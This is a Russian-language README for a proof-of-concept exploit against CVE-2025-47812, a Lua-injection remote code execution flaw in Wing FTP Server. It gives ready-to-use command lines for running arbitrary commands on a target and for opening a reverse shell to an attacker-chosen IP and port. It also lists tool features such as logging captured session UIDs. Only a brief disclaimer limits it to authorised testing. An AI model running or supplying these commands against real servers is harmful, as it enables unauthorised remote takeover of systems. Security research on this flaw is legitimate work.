
Эксплойт удаленного выполнения команд для Wing FTP Server (CVE-2025-47812)
В этом репозитории представлен proof-of-concept эксплойт для CVE-2025-47812 — уязвимости удалённого выполнения команд (RCE) в Wing FTP Server. Злоумышленник может внедрить и выполнить произвольные Lua-команды, манипулируя параметром username при аутентификации, что приводит к полному удалённому выполнению кода.
found_uids.txtВыполнение простой shell-команды:
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"
Запуск reverse shell:
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444
Режим dry-run (запросы отправляться не будут):
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run
| Особенность/Улучшение | Описание |
|---|---|
| ✅ Разбор аргументов | Добавлена поддержка CLI на основе argparse для неинтерактивного режима |
| 🔐 Проверка ввода | Проверка корректности URL/IP/порта перед попыткой эксплуатации |
| 📦 Рефакторинг заголовков | HTTP-заголовки вынесены в переиспользуемую функцию для единообразия |
| 📄 Логирование UID | Сохранение успешных UID-токенов в found_uids.txt |
| 🧪 Режим Dry-Run | Безопасное тестирование без отправки запросов (--dry-run) |
| 🕒 Таймаут и повторы | Добавлены таймаут запроса и автоматические повторы при сбоях |
| 🧼 Читаемость пейлоадов | Переформатирована строка Lua-инъекции для ясности и простоты поддержки |
| 📊 Структурированный вывод | Ответы сервера и информация о пейлоаде обёрнуты разделителями для удобства чтения |
| ⚠️ Проверка кодов состояния | Предупреждение, если цель возвращает неожиданные HTTP-статусы |
| 📝 Система логирования | print() заменён на модуль logging Python для лучшего контроля подробности |
Данный проект предназначен только для образовательных целей и авторизованного тестирования безопасности.
Не используйте этот инструмент против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.